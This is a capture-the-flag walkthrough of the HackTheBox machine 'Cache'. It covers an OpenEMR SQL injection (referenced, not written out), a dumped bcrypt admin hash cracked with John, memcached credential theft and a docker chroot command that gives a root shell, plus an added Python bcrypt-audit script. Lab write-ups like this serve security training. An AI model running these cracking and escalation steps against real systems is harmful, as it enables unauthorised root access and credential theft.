Recon

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

So the target should be port 80. Running Dirbuster against port 80 gives nothing useful. One interesting thing is that the .js code on the login page can be reviewed, which contains: The credential will be used later.

(After spending a few hours on other wrong directions) I notice that the user refers to “cache.htb” as his own server domain and mentions another project of his called “HMS”. So when I add 10.10.10.188 HMS.htb to /etc/hosts, I am redirected to another login page, one that cannot be reached unless the domain is configured. For why a hostname entry changes the response when the bare IP does not, see: https://stackoverflow.com/questions/823534/difference-between-specifying-ip-in-host-file-vs-using-ip-directly

Anyway, we start recon on the new page. The target domain runs OpenEMR, which is vulnerable to multiple known exploits. The first exploit we want to use is SQL injection. I will not go into the details, but you can refer to: https://www.open-emr.org/wiki/images/1/11/Openemr_insecurity.pdf The target DB contains many tables; we dump the users_secure table from it, which contains the useful information.

Table: users_secure
[1 entry]
+----+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| id | salt                           | username      | password                                                     | last_update         | salt_history2 | salt_history1 | password_history2 | password_history1 |
+----+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| 1  | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL          | NULL          | NULL              | NULL              |
+----+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+

The bcrypt password hash for user openemr_admin is: $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. Use John to crack it:

root@kali:~/htb/Cache_188# john -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (?)
1g 0:00:00:00 DONE (2020-05-25 12:31) 4.545g/s 3927p/s 3927c/s 3927C/s tristan..felipe
Use the "--show" option to display all of the cracked passwords reliably
Session completed
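As an added illustration that is not part of the original writeup, the Python below parses the dumped bcrypt string, shows why John reports an iteration count of 32 (cost 05 means 2^5 rounds), and checks that the separate salt column in users_secure is only the salt already embedded in the hash (OpenEMR's "A" and crypt()'s "." as 22nd salt character decode to the same 16 bytes). The minimum-cost threshold is an assumed audit policy value, not something the page states.

```python
import re

# bcrypt uses its own base64 alphabet, not the RFC 4648 one.
BCRYPT_ALPHABET = "./ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
# Assumed audit threshold; OWASP's password storage guidance suggests a work factor of 10 or more.
MIN_RECOMMENDED_COST = 10
# Full 60-char hash, or OpenEMR's salt-only form "$2a$05$<22 chars>$".
HASH_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})?\$?$")

# Constructed from the users_secure row dumped above.
SAMPLE_ROW = {
    "username": "openemr_admin",
    "salt": "$2a$05$l2sTLIG6GTBeyBf7TAKL6A$",
    "password": "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.",
}

def bcrypt_b64decode(text: str) -> bytes:
    """Decode bcrypt base64; trailing bits that do not fill a whole byte are dropped."""
    acc, nbits, out = 0, 0, bytearray()
    for ch in text:
        acc = (acc << 6) | BCRYPT_ALPHABET.index(ch)
        nbits += 6
        while nbits >= 8:
            nbits -= 8
            out.append((acc >> nbits) & 0xFF)
    return bytes(out)

def parse_bcrypt(value: str) -> dict:
    """Split a modular-crypt bcrypt string into variant, cost, salt and digest."""
    m = HASH_RE.match(value)
    if not m:
        raise ValueError(f"not a bcrypt string: {value!r}")
    variant, cost, salt, digest = m.groups()
    return {
        "variant": variant,
        "cost": int(cost),
        "rounds": 2 ** int(cost),              # what John prints as the iteration count
        "salt": salt,
        "salt_bytes": bcrypt_b64decode(salt),  # 22 chars = 132 bits; only 128 are used
        "digest": digest,                      # None for the salt-only form
    }

def audit_users_secure(row: dict) -> list:
    """Return human-readable findings for one users_secure row."""
    findings, stored = [], parse_bcrypt(row["password"])
    if stored["cost"] < MIN_RECOMMENDED_COST:
        findings.append(f"{row['username']}: bcrypt cost {stored['cost']} ({stored['rounds']} rounds) "
                        f"is below the assumed minimum of {MIN_RECOMMENDED_COST}")
    if row.get("salt"):
        same = parse_bcrypt(row["salt"])["salt_bytes"] == stored["salt_bytes"]
        findings.append(f"{row['username']}: salt column "
                        + ("duplicates the salt embedded in the hash" if same else "does not match the hash"))
    return findings

if __name__ == "__main__":
    print("\n".join(audit_users_secure(SAMPLE_ROW)))
```

The low cost is what makes the wordlist run above finish in under a second at a few thousand candidates per second; raising the work factor is the mitigation on the storage side.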

Now we can use the public exploit to get a shell as www-data: https://www.exploit-db.com/exploits/45161

User

Going from www-data to a user is pretty simple: su with the credentials found earlier. Then download lse.sh to the target machine (note that /tmp is not writable) and it quickly shows that some service is listening on local port 11211. On further checking, the service turns out to be memcached. To retrieve the data stored in it, I follow the official documentation and https://stackoverflow.com/questions/19560150/get-all-keys-set-in-memcached The credentials for the second user can be obtained from memcached.

Root

Run lse.sh again and find that docker is running. Go to GTFOBins and find the corresponding command to spawn a root shell.

luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh

ls
bin   home            lib64       opt   sbin      sys   vmlinuz
boot  initrd.img      lost+found  proc  snap      tmp   vmlinuz.old
dev   initrd.img.old  media       root  srv       usr
etc   lib             mnt         run   swap.img  var

whoami
root